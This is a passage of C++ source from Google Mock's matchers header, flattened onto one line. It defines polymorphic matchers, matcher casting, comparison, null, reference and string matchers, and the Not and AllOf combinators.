Eq("foo") sometimes. Matcher(const char* s); // NOLINT // Allows the user to pass StringPieces directly. Matcher(StringPiece s); // NOLINT }; #endif // GTEST_HAS_STRING_PIECE_ // The PolymorphicMatcher class template makes it easy to implement a // polymorphic matcher (i.e. a matcher that can match values of more // than one type, e.g. Eq(n) and NotNull()). // // To define a polymorphic matcher, a user should provide an Impl // class that has a DescribeTo() method and a DescribeNegationTo() // method, and define a member function (or member function template) // // bool MatchAndExplain(const Value& value, // MatchResultListener* listener) const; // // See the definition of NotNull() for a complete example. template <class Impl> class PolymorphicMatcher { public: explicit PolymorphicMatcher(const Impl& an_impl) : impl_(an_impl) {} // Returns a mutable reference to the underlying matcher // implementation object. Impl& mutable_impl() { return impl_; } // Returns an immutable reference to the underlying matcher // implementation object. const Impl& impl() const { return impl_; } template <typename T> operator Matcher<T>() const { return Matcher<T>(new MonomorphicImpl<T>(impl_)); } private: template <typename T> class MonomorphicImpl : public MatcherInterface<T> { public: explicit MonomorphicImpl(const Impl& impl) : impl_(impl) {} virtual void DescribeTo(::std::ostream* os) const { impl_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { impl_.DescribeNegationTo(os); } virtual bool MatchAndExplain(T x, MatchResultListener* listener) const { return impl_.MatchAndExplain(x, listener); } private: const Impl impl_; GTEST_DISALLOW_ASSIGN_(MonomorphicImpl); }; Impl impl_; GTEST_DISALLOW_ASSIGN_(PolymorphicMatcher); }; // Creates a matcher from its implementation. This is easier to use // than the Matcher<T> constructor as it doesn't require you to // explicitly write the template argument, e.g. // // MakeMatcher(foo); // vs // Matcher<const string&>(foo); template <typename T> inline Matcher<T> MakeMatcher(const MatcherInterface<T>* impl) { return Matcher<T>(impl); } // Creates a polymorphic matcher from its implementation. This is // easier to use than the PolymorphicMatcher<Impl> constructor as it // doesn't require you to explicitly write the template argument, e.g. // // MakePolymorphicMatcher(foo); // vs // PolymorphicMatcher<TypeOfFoo>(foo); template <class Impl> inline PolymorphicMatcher<Impl> MakePolymorphicMatcher(const Impl& impl) { return PolymorphicMatcher<Impl>(impl); } // Anything inside the 'internal' namespace IS INTERNAL IMPLEMENTATION // and MUST NOT BE USED IN USER CODE!!! namespace internal { // The MatcherCastImpl class template is a helper for implementing // MatcherCast(). We need this helper in order to partially // specialize the implementation of MatcherCast() (C++ allows // class/struct templates to be partially specialized, but not // function templates.). // This general version is used when MatcherCast()'s argument is a // polymorphic matcher (i.e. something that can be converted to a // Matcher but is not one yet; for example, Eq(value)) or a value (for // example, "hello"). template <typename T, typename M> class MatcherCastImpl { public: static Matcher<T> Cast(const M& polymorphic_matcher_or_value) { // M can be a polymorhic matcher, in which case we want to use // its conversion operator to create Matcher<T>. Or it can be a value // that should be passed to the Matcher<T>'s constructor. // // We can't call Matcher<T>(polymorphic_matcher_or_value) when M is a // polymorphic matcher because it'll be ambiguous if T has an implicit // constructor from M (this usually happens when T has an implicit // constructor from any type). // // It won't work to unconditionally implict_cast // polymorphic_matcher_or_value to Matcher<T> because it won't trigger // a user-defined conversion from M to T if one exists (assuming M is // a value). return CastImpl( polymorphic_matcher_or_value, BooleanConstant< internal::ImplicitlyConvertible<M, Matcher<T> >::value>()); } private: static Matcher<T> CastImpl(const M& value, BooleanConstant<false>) { // M can't be implicitly converted to Matcher<T>, so M isn't a polymorphic // matcher. It must be a value then. Use direct initialization to create // a matcher. return Matcher<T>(ImplicitCast_<T>(value)); } static Matcher<T> CastImpl(const M& polymorphic_matcher_or_value, BooleanConstant<true>) { // M is implicitly convertible to Matcher<T>, which means that either // M is a polymorhpic matcher or Matcher<T> has an implicit constructor // from M. In both cases using the implicit conversion will produce a // matcher. // // Even if T has an implicit constructor from M, it won't be called because // creating Matcher<T> would require a chain of two user-defined conversions // (first to create T from M and then to create Matcher<T> from T). return polymorphic_matcher_or_value; } }; // This more specialized version is used when MatcherCast()'s argument // is already a Matcher. This only compiles when type T can be // statically converted to type U. template <typename T, typename U> class MatcherCastImpl<T, Matcher<U> > { public: static Matcher<T> Cast(const Matcher<U>& source_matcher) { return Matcher<T>(new Impl(source_matcher)); } private: class Impl : public MatcherInterface<T> { public: explicit Impl(const Matcher<U>& source_matcher) : source_matcher_(source_matcher) {} // We delegate the matching logic to the source matcher. virtual bool MatchAndExplain(T x, MatchResultListener* listener) const { return source_matcher_.MatchAndExplain(static_cast<U>(x), listener); } virtual void DescribeTo(::std::ostream* os) const { source_matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { source_matcher_.DescribeNegationTo(os); } private: const Matcher<U> source_matcher_; GTEST_DISALLOW_ASSIGN_(Impl); }; }; // This even more specialized version is used for efficiently casting // a matcher to its own type. template <typename T> class MatcherCastImpl<T, Matcher<T> > { public: static Matcher<T> Cast(const Matcher<T>& matcher) { return matcher; } }; } // namespace internal // In order to be safe and clear, casting between different matcher // types is done explicitly via MatcherCast<T>(m), which takes a // matcher m and returns a Matcher<T>. It compiles only when T can be // statically converted to the argument type of m. template <typename T, typename M> inline Matcher<T> MatcherCast(const M& matcher) { return internal::MatcherCastImpl<T, M>::Cast(matcher); } // Implements SafeMatcherCast(). // // We use an intermediate class to do the actual safe casting as Nokia's // Symbian compiler cannot decide between // template <T, M> ... (M) and // template <T, U> ... (const Matcher<U>&) // for function templates but can for member function templates. template <typename T> class SafeMatcherCastImpl { public: // This overload handles polymorphic matchers and values only since // monomorphic matchers are handled by the next one. template <typename M> static inline Matcher<T> Cast(const M& polymorphic_matcher_or_value) { return internal::MatcherCastImpl<T, M>::Cast(polymorphic_matcher_or_value); } // This overload handles monomorphic matchers. // // In general, if type T can be implicitly converted to type U, we can // safely convert a Matcher<U> to a Matcher<T> (i.e. Matcher is // contravariant): just keep a copy of the original Matcher<U>, convert the // argument from type T to U, and then pass it to the underlying Matcher<U>. // The only exception is when U is a reference and T is not, as the // underlying Matcher<U> may be interested in the argument's address, which // is not preserved in the conversion from T to U. template <typename U> static inline Matcher<T> Cast(const Matcher<U>& matcher) { // Enforce that T can be implicitly converted to U. GTEST_COMPILE_ASSERT_((internal::ImplicitlyConvertible<T, U>::value), T_must_be_implicitly_convertible_to_U); // Enforce that we are not converting a non-reference type T to a reference // type U. GTEST_COMPILE_ASSERT_( internal::is_reference<T>::value || !internal::is_reference<U>::value, cannot_convert_non_referentce_arg_to_reference); // In case both T and U are arithmetic types, enforce that the // conversion is not lossy. typedef GTEST_REMOVE_REFERENCE_AND_CONST_(T) RawT; typedef GTEST_REMOVE_REFERENCE_AND_CONST_(U) RawU; const bool kTIsOther = GMOCK_KIND_OF_(RawT) == internal::kOther; const bool kUIsOther = GMOCK_KIND_OF_(RawU) == internal::kOther; GTEST_COMPILE_ASSERT_( kTIsOther || kUIsOther || (internal::LosslessArithmeticConvertible<RawT, RawU>::value), conversion_of_arithmetic_types_must_be_lossless); return MatcherCast<T>(matcher); } }; template <typename T, typename M> inline Matcher<T> SafeMatcherCast(const M& polymorphic_matcher) { return SafeMatcherCastImpl<T>::Cast(polymorphic_matcher); } // A<T>() returns a matcher that matches any value of type T. template <typename T> Matcher<T> A(); // Anything inside the 'internal' namespace IS INTERNAL IMPLEMENTATION // and MUST NOT BE USED IN USER CODE!!! namespace internal { // If the explanation is not empty, prints it to the ostream. inline void PrintIfNotEmpty(const internal::string& explanation, ::std::ostream* os) { if (explanation != "" && os != NULL) { *os << ", " << explanation; } } // Returns true if the given type name is easy to read by a human. // This is used to decide whether printing the type of a value might // be helpful. inline bool IsReadableTypeName(const string& type_name) { // We consider a type name readable if it's short or doesn't contain // a template or function type. return (type_name.length() <= 20 || type_name.find_first_of("<(") == string::npos); } // Matches the value against the given matcher, prints the value and explains // the match result to the listener. Returns the match result. // 'listener' must not be NULL. // Value cannot be passed by const reference, because some matchers take a // non-const argument. template <typename Value, typename T> bool MatchPrintAndExplain(Value& value, const Matcher<T>& matcher, MatchResultListener* listener) { if (!listener->IsInterested()) { // If the listener is not interested, we do not need to construct the // inner explanation. return matcher.Matches(value); } StringMatchResultListener inner_listener; const bool match = matcher.MatchAndExplain(value, &inner_listener); UniversalPrint(value, listener->stream()); #if GTEST_HAS_RTTI const string& type_name = GetTypeName<Value>(); if (IsReadableTypeName(type_name)) *listener->stream() << " (of type " << type_name << ")"; #endif PrintIfNotEmpty(inner_listener.str(), listener->stream()); return match; } // An internal helper class for doing compile-time loop on a tuple's // fields. template <size_t N> class TuplePrefix { public: // TuplePrefix<N>::Matches(matcher_tuple, value_tuple) returns true // iff the first N fields of matcher_tuple matches the first N // fields of value_tuple, respectively. template <typename MatcherTuple, typename ValueTuple> static bool Matches(const MatcherTuple& matcher_tuple, const ValueTuple& value_tuple) { return TuplePrefix<N - 1>::Matches(matcher_tuple, value_tuple) && get<N - 1>(matcher_tuple).Matches(get<N - 1>(value_tuple)); } // TuplePrefix<N>::ExplainMatchFailuresTo(matchers, values, os) // describes failures in matching the first N fields of matchers // against the first N fields of values. If there is no failure, // nothing will be streamed to os. template <typename MatcherTuple, typename ValueTuple> static void ExplainMatchFailuresTo(const MatcherTuple& matchers, const ValueTuple& values, ::std::ostream* os) { // First, describes failures in the first N - 1 fields. TuplePrefix<N - 1>::ExplainMatchFailuresTo(matchers, values, os); // Then describes the failure (if any) in the (N - 1)-th (0-based) // field. typename tuple_element<N - 1, MatcherTuple>::type matcher = get<N - 1>(matchers); typedef typename tuple_element<N - 1, ValueTuple>::type Value; Value value = get<N - 1>(values); StringMatchResultListener listener; if (!matcher.MatchAndExplain(value, &listener)) { // TODO(wan): include in the message the name of the parameter // as used in MOCK_METHOD*() when possible. *os << " Expected arg #" << N - 1 << ": "; get<N - 1>(matchers).DescribeTo(os); *os << "\n Actual: "; // We remove the reference in type Value to prevent the // universal printer from printing the address of value, which // isn't interesting to the user most of the time. The // matcher's MatchAndExplain() method handles the case when // the address is interesting. internal::UniversalPrint(value, os); PrintIfNotEmpty(listener.str(), os); *os << "\n"; } } }; // The base case. template <> class TuplePrefix<0> { public: template <typename MatcherTuple, typename ValueTuple> static bool Matches(const MatcherTuple& /* matcher_tuple */, const ValueTuple& /* value_tuple */) { return true; } template <typename MatcherTuple, typename ValueTuple> static void ExplainMatchFailuresTo(const MatcherTuple& /* matchers */, const ValueTuple& /* values */, ::std::ostream* /* os */) {} }; // TupleMatches(matcher_tuple, value_tuple) returns true iff all // matchers in matcher_tuple match the corresponding fields in // value_tuple. It is a compiler error if matcher_tuple and // value_tuple have different number of fields or incompatible field // types. template <typename MatcherTuple, typename ValueTuple> bool TupleMatches(const MatcherTuple& matcher_tuple, const ValueTuple& value_tuple) { // Makes sure that matcher_tuple and value_tuple have the same // number of fields. GTEST_COMPILE_ASSERT_(tuple_size<MatcherTuple>::value == tuple_size<ValueTuple>::value, matcher_and_value_have_different_numbers_of_fields); return TuplePrefix<tuple_size<ValueTuple>::value>:: Matches(matcher_tuple, value_tuple); } // Describes failures in matching matchers against values. If there // is no failure, nothing will be streamed to os. template <typename MatcherTuple, typename ValueTuple> void ExplainMatchFailureTupleTo(const MatcherTuple& matchers, const ValueTuple& values, ::std::ostream* os) { TuplePrefix<tuple_size<MatcherTuple>::value>::ExplainMatchFailuresTo( matchers, values, os); } // TransformTupleValues and its helper. // // TransformTupleValuesHelper hides the internal machinery that // TransformTupleValues uses to implement a tuple traversal. template <typename Tuple, typename Func, typename OutIter> class TransformTupleValuesHelper { private: typedef ::testing::tuple_size<Tuple> TupleSize; public: // For each member of tuple 't', taken in order, evaluates '*out++ = f(t)'. // Returns the final value of 'out' in case the caller needs it. static OutIter Run(Func f, const Tuple& t, OutIter out) { return IterateOverTuple<Tuple, TupleSize::value>()(f, t, out); } private: template <typename Tup, size_t kRemainingSize> struct IterateOverTuple { OutIter operator() (Func f, const Tup& t, OutIter out) const { *out++ = f(::testing::get<TupleSize::value - kRemainingSize>(t)); return IterateOverTuple<Tup, kRemainingSize - 1>()(f, t, out); } }; template <typename Tup> struct IterateOverTuple<Tup, 0> { OutIter operator() (Func /* f */, const Tup& /* t */, OutIter out) const { return out; } }; }; // Successively invokes 'f(element)' on each element of the tuple 't', // appending each result to the 'out' iterator. Returns the final value // of 'out'. template <typename Tuple, typename Func, typename OutIter> OutIter TransformTupleValues(Func f, const Tuple& t, OutIter out) { return TransformTupleValuesHelper<Tuple, Func, OutIter>::Run(f, t, out); } // Implements A<T>(). template <typename T> class AnyMatcherImpl : public MatcherInterface<T> { public: virtual bool MatchAndExplain( T /* x */, MatchResultListener* /* listener */) const { return true; } virtual void DescribeTo(::std::ostream* os) const { *os << "is anything"; } virtual void DescribeNegationTo(::std::ostream* os) const { // This is mostly for completeness' safe, as it's not very useful // to write Not(A<bool>()). However we cannot completely rule out // such a possibility, and it doesn't hurt to be prepared. *os << "never matches"; } }; // Implements _, a matcher that matches any value of any // type. This is a polymorphic matcher, so we need a template type // conversion operator to make it appearing as a Matcher<T> for any // type T. class AnythingMatcher { public: template <typename T> operator Matcher<T>() const { return A<T>(); } }; // Implements a matcher that compares a given value with a // pre-supplied value using one of the ==, <=, <, etc, operators. The // two values being compared don't have to have the same type. // // The matcher defined here is polymorphic (for example, Eq(5) can be // used to match an int, a short, a double, etc). Therefore we use // a template type conversion operator in the implementation. // // We define this as a macro in order to eliminate duplicated source // code. // // The following template definition assumes that the Rhs parameter is // a "bare" type (i.e. neither 'const T' nor 'T&'). #define GMOCK_IMPLEMENT_COMPARISON_MATCHER_( \ name, op, relation, negated_relation) \ template <typename Rhs> class name##Matcher { \ public: \ explicit name##Matcher(const Rhs& rhs) : rhs_(rhs) {} \ template <typename Lhs> \ operator Matcher<Lhs>() const { \ return MakeMatcher(new Impl<Lhs>(rhs_)); \ } \ private: \ template <typename Lhs> \ class Impl : public MatcherInterface<Lhs> { \ public: \ explicit Impl(const Rhs& rhs) : rhs_(rhs) {} \ virtual bool MatchAndExplain(\ Lhs lhs, MatchResultListener* /* listener */) const { \ return lhs op rhs_; \ } \ virtual void DescribeTo(::std::ostream* os) const { \ *os << relation " "; \ UniversalPrint(rhs_, os); \ } \ virtual void DescribeNegationTo(::std::ostream* os) const { \ *os << negated_relation " "; \ UniversalPrint(rhs_, os); \ } \ private: \ Rhs rhs_; \ GTEST_DISALLOW_ASSIGN_(Impl); \ }; \ Rhs rhs_; \ GTEST_DISALLOW_ASSIGN_(name##Matcher); \ } // Implements Eq(v), Ge(v), Gt(v), Le(v), Lt(v), and Ne(v) // respectively. GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Eq, ==, "is equal to", "isn't equal to"); GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Ge, >=, "is >=", "isn't >="); GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Gt, >, "is >", "isn't >"); GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Le, <=, "is <=", "isn't <="); GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Lt, <, "is <", "isn't <"); GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Ne, !=, "isn't equal to", "is equal to"); #undef GMOCK_IMPLEMENT_COMPARISON_MATCHER_ // Implements the polymorphic IsNull() matcher, which matches any raw or smart // pointer that is NULL. class IsNullMatcher { public: template <typename Pointer> bool MatchAndExplain(const Pointer& p, MatchResultListener* /* listener */) const { return GetRawPointer(p) == NULL; } void DescribeTo(::std::ostream* os) const { *os << "is NULL"; } void DescribeNegationTo(::std::ostream* os) const { *os << "isn't NULL"; } }; // Implements the polymorphic NotNull() matcher, which matches any raw or smart // pointer that is not NULL. class NotNullMatcher { public: template <typename Pointer> bool MatchAndExplain(const Pointer& p, MatchResultListener* /* listener */) const { return GetRawPointer(p) != NULL; } void DescribeTo(::std::ostream* os) const { *os << "isn't NULL"; } void DescribeNegationTo(::std::ostream* os) const { *os << "is NULL"; } }; // Ref(variable) matches any argument that is a reference to // 'variable'. This matcher is polymorphic as it can match any // super type of the type of 'variable'. // // The RefMatcher template class implements Ref(variable). It can // only be instantiated with a reference type. This prevents a user // from mistakenly using Ref(x) to match a non-reference function // argument. For example, the following will righteously cause a // compiler error: // // int n; // Matcher<int> m1 = Ref(n); // This won't compile. // Matcher<int&> m2 = Ref(n); // This will compile. template <typename T> class RefMatcher; template <typename T> class RefMatcher<T&> { // Google Mock is a generic framework and thus needs to support // mocking any function types, including those that take non-const // reference arguments. Therefore the template parameter T (and // Super below) can be instantiated to either a const type or a // non-const type. public: // RefMatcher() takes a T& instead of const T&, as we want the // compiler to catch using Ref(const_value) as a matcher for a // non-const reference. explicit RefMatcher(T& x) : object_(x) {} // NOLINT template <typename Super> operator Matcher<Super&>() const { // By passing object_ (type T&) to Impl(), which expects a Super&, // we make sure that Super is a super type of T. In particular, // this catches using Ref(const_value) as a matcher for a // non-const reference, as you cannot implicitly convert a const // reference to a non-const reference. return MakeMatcher(new Impl<Super>(object_)); } private: template <typename Super> class Impl : public MatcherInterface<Super&> { public: explicit Impl(Super& x) : object_(x) {} // NOLINT // MatchAndExplain() takes a Super& (as opposed to const Super&) // in order to match the interface MatcherInterface<Super&>. virtual bool MatchAndExplain( Super& x, MatchResultListener* listener) const { *listener << "which is located @" << static_cast<const void*>(&x); return &x == &object_; } virtual void DescribeTo(::std::ostream* os) const { *os << "references the variable "; UniversalPrinter<Super&>::Print(object_, os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "does not reference the variable "; UniversalPrinter<Super&>::Print(object_, os); } private: const Super& object_; GTEST_DISALLOW_ASSIGN_(Impl); }; T& object_; GTEST_DISALLOW_ASSIGN_(RefMatcher); }; // Polymorphic helper functions for narrow and wide string matchers. inline bool CaseInsensitiveCStringEquals(const char* lhs, const char* rhs) { return String::CaseInsensitiveCStringEquals(lhs, rhs); } inline bool CaseInsensitiveCStringEquals(const wchar_t* lhs, const wchar_t* rhs) { return String::CaseInsensitiveWideCStringEquals(lhs, rhs); } // String comparison for narrow or wide strings that can have embedded NUL // characters. template <typename StringType> bool CaseInsensitiveStringEquals(const StringType& s1, const StringType& s2) { // Are the heads equal? if (!CaseInsensitiveCStringEquals(s1.c_str(), s2.c_str())) { return false; } // Skip the equal heads. const typename StringType::value_type nul = 0; const size_t i1 = s1.find(nul), i2 = s2.find(nul); // Are we at the end of either s1 or s2? if (i1 == StringType::npos || i2 == StringType::npos) { return i1 == i2; } // Are the tails equal? return CaseInsensitiveStringEquals(s1.substr(i1 + 1), s2.substr(i2 + 1)); } // String matchers. // Implements equality-based string matchers like StrEq, StrCaseNe, and etc. template <typename StringType> class StrEqualityMatcher { public: StrEqualityMatcher(const StringType& str, bool expect_eq, bool case_sensitive) : string_(str), expect_eq_(expect_eq), case_sensitive_(case_sensitive) {} // Accepts pointer types, particularly: // const char* // char* // const wchar_t* // wchar_t* template <typename CharType> bool MatchAndExplain(CharType* s, MatchResultListener* listener) const { if (s == NULL) { return !expect_eq_; } return MatchAndExplain(StringType(s), listener); } // Matches anything that can convert to StringType. // // This is a template, not just a plain function with const StringType&, // because StringPiece has some interfering non-explicit constructors. template <typename MatcheeStringType> bool MatchAndExplain(const MatcheeStringType& s, MatchResultListener* /* listener */) const { const StringType& s2(s); const bool eq = case_sensitive_ ? s2 == string_ : CaseInsensitiveStringEquals(s2, string_); return expect_eq_ == eq; } void DescribeTo(::std::ostream* os) const { DescribeToHelper(expect_eq_, os); } void DescribeNegationTo(::std::ostream* os) const { DescribeToHelper(!expect_eq_, os); } private: void DescribeToHelper(bool expect_eq, ::std::ostream* os) const { *os << (expect_eq ? "is " : "isn't "); *os << "equal to "; if (!case_sensitive_) { *os << "(ignoring case) "; } UniversalPrint(string_, os); } const StringType string_; const bool expect_eq_; const bool case_sensitive_; GTEST_DISALLOW_ASSIGN_(StrEqualityMatcher); }; // Implements the polymorphic HasSubstr(substring) matcher, which // can be used as a Matcher<T> as long as T can be converted to a // string. template <typename StringType> class HasSubstrMatcher { public: explicit HasSubstrMatcher(const StringType& substring) : substring_(substring) {} // Accepts pointer types, particularly: // const char* // char* // const wchar_t* // wchar_t* template <typename CharType> bool MatchAndExplain(CharType* s, MatchResultListener* listener) const { return s != NULL && MatchAndExplain(StringType(s), listener); } // Matches anything that can convert to StringType. // // This is a template, not just a plain function with const StringType&, // because StringPiece has some interfering non-explicit constructors. template <typename MatcheeStringType> bool MatchAndExplain(const MatcheeStringType& s, MatchResultListener* /* listener */) const { const StringType& s2(s); return s2.find(substring_) != StringType::npos; } // Describes what this matcher matches. void DescribeTo(::std::ostream* os) const { *os << "has substring "; UniversalPrint(substring_, os); } void DescribeNegationTo(::std::ostream* os) const { *os << "has no substring "; UniversalPrint(substring_, os); } private: const StringType substring_; GTEST_DISALLOW_ASSIGN_(HasSubstrMatcher); }; // Implements the polymorphic StartsWith(substring) matcher, which // can be used as a Matcher<T> as long as T can be converted to a // string. template <typename StringType> class StartsWithMatcher { public: explicit StartsWithMatcher(const StringType& prefix) : prefix_(prefix) { } // Accepts pointer types, particularly: // const char* // char* // const wchar_t* // wchar_t* template <typename CharType> bool MatchAndExplain(CharType* s, MatchResultListener* listener) const { return s != NULL && MatchAndExplain(StringType(s), listener); } // Matches anything that can convert to StringType. // // This is a template, not just a plain function with const StringType&, // because StringPiece has some interfering non-explicit constructors. template <typename MatcheeStringType> bool MatchAndExplain(const MatcheeStringType& s, MatchResultListener* /* listener */) const { const StringType& s2(s); return s2.length() >= prefix_.length() && s2.substr(0, prefix_.length()) == prefix_; } void DescribeTo(::std::ostream* os) const { *os << "starts with "; UniversalPrint(prefix_, os); } void DescribeNegationTo(::std::ostream* os) const { *os << "doesn't start with "; UniversalPrint(prefix_, os); } private: const StringType prefix_; GTEST_DISALLOW_ASSIGN_(StartsWithMatcher); }; // Implements the polymorphic EndsWith(substring) matcher, which // can be used as a Matcher<T> as long as T can be converted to a // string. template <typename StringType> class EndsWithMatcher { public: explicit EndsWithMatcher(const StringType& suffix) : suffix_(suffix) {} // Accepts pointer types, particularly: // const char* // char* // const wchar_t* // wchar_t* template <typename CharType> bool MatchAndExplain(CharType* s, MatchResultListener* listener) const { return s != NULL && MatchAndExplain(StringType(s), listener); } // Matches anything that can convert to StringType. // // This is a template, not just a plain function with const StringType&, // because StringPiece has some interfering non-explicit constructors. template <typename MatcheeStringType> bool MatchAndExplain(const MatcheeStringType& s, MatchResultListener* /* listener */) const { const StringType& s2(s); return s2.length() >= suffix_.length() && s2.substr(s2.length() - suffix_.length()) == suffix_; } void DescribeTo(::std::ostream* os) const { *os << "ends with "; UniversalPrint(suffix_, os); } void DescribeNegationTo(::std::ostream* os) const { *os << "doesn't end with "; UniversalPrint(suffix_, os); } private: const StringType suffix_; GTEST_DISALLOW_ASSIGN_(EndsWithMatcher); }; // Implements polymorphic matchers MatchesRegex(regex) and // ContainsRegex(regex), which can be used as a Matcher<T> as long as // T can be converted to a string. class MatchesRegexMatcher { public: MatchesRegexMatcher(const RE* regex, bool full_match) : regex_(regex), full_match_(full_match) {} // Accepts pointer types, particularly: // const char* // char* // const wchar_t* // wchar_t* template <typename CharType> bool MatchAndExplain(CharType* s, MatchResultListener* listener) const { return s != NULL && MatchAndExplain(internal::string(s), listener); } // Matches anything that can convert to internal::string. // // This is a template, not just a plain function with const internal::string&, // because StringPiece has some interfering non-explicit constructors. template <class MatcheeStringType> bool MatchAndExplain(const MatcheeStringType& s, MatchResultListener* /* listener */) const { const internal::string& s2(s); return full_match_ ? RE::FullMatch(s2, *regex_) : RE::PartialMatch(s2, *regex_); } void DescribeTo(::std::ostream* os) const { *os << (full_match_ ? "matches" : "contains") << " regular expression "; UniversalPrinter<internal::string>::Print(regex_->pattern(), os); } void DescribeNegationTo(::std::ostream* os) const { *os << "doesn't " << (full_match_ ? "match" : "contain") << " regular expression "; UniversalPrinter<internal::string>::Print(regex_->pattern(), os); } private: const internal::linked_ptr<const RE> regex_; const bool full_match_; GTEST_DISALLOW_ASSIGN_(MatchesRegexMatcher); }; // Implements a matcher that compares the two fields of a 2-tuple // using one of the ==, <=, <, etc, operators. The two fields being // compared don't have to have the same type. // // The matcher defined here is polymorphic (for example, Eq() can be // used to match a tuple<int, short>, a tuple<const long&, double>, // etc). Therefore we use a template type conversion operator in the // implementation. // // We define this as a macro in order to eliminate duplicated source // code. #define GMOCK_IMPLEMENT_COMPARISON2_MATCHER_(name, op, relation) \ class name##2Matcher { \ public: \ template <typename T1, typename T2> \ operator Matcher< ::testing::tuple<T1, T2> >() const { \ return MakeMatcher(new Impl< ::testing::tuple<T1, T2> >); \ } \ template <typename T1, typename T2> \ operator Matcher<const ::testing::tuple<T1, T2>&>() const { \ return MakeMatcher(new Impl<const ::testing::tuple<T1, T2>&>); \ } \ private: \ template <typename Tuple> \ class Impl : public MatcherInterface<Tuple> { \ public: \ virtual bool MatchAndExplain( \ Tuple args, \ MatchResultListener* /* listener */) const { \ return ::testing::get<0>(args) op ::testing::get<1>(args); \ } \ virtual void DescribeTo(::std::ostream* os) const { \ *os << "are " relation; \ } \ virtual void DescribeNegationTo(::std::ostream* os) const { \ *os << "aren't " relation; \ } \ }; \ } // Implements Eq(), Ge(), Gt(), Le(), Lt(), and Ne() respectively. GMOCK_IMPLEMENT_COMPARISON2_MATCHER_(Eq, ==, "an equal pair"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_( Ge, >=, "a pair where the first >= the second"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_( Gt, >, "a pair where the first > the second"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_( Le, <=, "a pair where the first <= the second"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_( Lt, <, "a pair where the first < the second"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_(Ne, !=, "an unequal pair"); #undef GMOCK_IMPLEMENT_COMPARISON2_MATCHER_ // Implements the Not(...) matcher for a particular argument type T. // We do not nest it inside the NotMatcher class template, as that // will prevent different instantiations of NotMatcher from sharing // the same NotMatcherImpl<T> class. template <typename T> class NotMatcherImpl : public MatcherInterface<T> { public: explicit NotMatcherImpl(const Matcher<T>& matcher) : matcher_(matcher) {} virtual bool MatchAndExplain(T x, MatchResultListener* listener) const { return !matcher_.MatchAndExplain(x, listener); } virtual void DescribeTo(::std::ostream* os) const { matcher_.DescribeNegationTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { matcher_.DescribeTo(os); } private: const Matcher<T> matcher_; GTEST_DISALLOW_ASSIGN_(NotMatcherImpl); }; // Implements the Not(m) matcher, which matches a value that doesn't // match matcher m. template <typename InnerMatcher> class NotMatcher { public: explicit NotMatcher(InnerMatcher matcher) : matcher_(matcher) {} // This template type conversion operator allows Not(m) to be used // to match any type m can match. template <typename T> operator Matcher<T>() const { return Matcher<T>(new NotMatcherImpl<T>(SafeMatcherCast<T>(matcher_))); } private: InnerMatcher matcher_; GTEST_DISALLOW_ASSIGN_(NotMatcher); }; // Implements the AllOf(m1, m2) matcher for a particular argument type // T. We do not nest it inside the BothOfMatcher class template, as // that will prevent different instantiations of BothOfMatcher from // sharing the same BothOfMatcherImpl<T> class. template <typename T> class BothOfMatcherImpl : public MatcherInterface<T> { public: BothOfMatcherImpl(const Matcher<T>& matcher1, const Matcher<T>& matcher2) : matcher1_(matcher1), matcher2_(matcher2) {} virtual void DescribeTo(::std::ostream* os) const { *os << "("; matcher1_.DescribeTo(os); *os << ") and ("; matcher2_.DescribeTo(os); *os << ")"; } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "("; matcher1_.DescribeNegationTo(os); *os << ") or ("; matcher2_.DescribeNegationTo(os); *os << ")"; } virtual bool MatchAndExplain(T x, MatchResultListener* listener) const { // If either matcher1_ or matcher2_ doesn't match x, we only need // to explain why one of them fails. StringMatchResultListener listener1; if (!matcher1_.MatchAndExplain(x, &listener1)) { *listener << listener1.str(); return false; } StringMatchResultListener listener2; if (!matcher2_.MatchAndExplain(x, &listener2)) { *listener << listener2.str(); return false; } // Otherwise we need to explain why *both* of them match. const internal::string s1 = listener1.str(); const internal::string s2 = listener2.str(); if (s1 == "") { *listener << s2; } else { *listener << s1; if (s2 != "") { *listener << ", and " << s2; } } return true; } private: const Matcher<T> matcher1_; const Matcher<T> matcher2_; GTEST_DISALLOW_ASSIGN_(BothOfMatcherImpl); }; #if GTEST_LANG_CXX11 // MatcherList provides mechanisms for storing a variable number of matchers in // a list structure (ListType) and creating a combining matcher from such a // list. // The template is defined recursively using the following template paramters: // * kSize is the length of the MatcherList. // * Head is the type of the first matcher of the list. // * Tail denotes the types of the remaining matchers of the list. template <int kSize, typename Head, typename... Tail> struct MatcherList { typedef MatcherList<kSize - 1, Tail...> MatcherListTail; typedef ::std::pair<Head, typename MatcherListTail::ListType> ListType; // BuildList stores variadic type values in a nested pair structure. // Example: // MatcherList<3, int, string, float>::BuildList(5, "foo", 2.0) will return // the corresponding result of type pair<int, pair<string, float>>. static ListType BuildList(const Head& matcher, const Tail&... tail) { return ListType(matcher, MatcherListTail::BuildList(tail...)); } // CreateMatcher<T> creates a Matcher<T> from a given list of matchers (built // by BuildList()). CombiningMatcher<T> is used to combine the matchers of the // list. CombiningMatcher<T> must implement MatcherInterface<T> and have a // constructor taking two Matcher<T>s as input. template <typename T, template <typename /* T */> class CombiningMatcher> static Matcher<T> CreateMatcher(const ListType& matchers) { return Matcher<T>(new CombiningMatcher<T>( SafeMatcherCast<T>(matchers.first), MatcherListTail::template CreateMatcher<T, CombiningMatcher>( matchers.second))); } }; // The following defines the base case for the recursive definition of // MatcherList. template <typename Matcher1, typename Matcher2> struct MatcherList<2, Matcher1, Matcher2> { typedef ::std::pair<Matcher1, Matcher2> ListType; static ListType BuildList(const Matcher1& matcher1, const Matcher2& matcher2) { return ::std::pair<Matcher1, Matcher2>(matcher1, matcher2); } template <typename T, template <typename /* T */> class CombiningMatcher> static Matcher<T> CreateMatcher(const ListType& 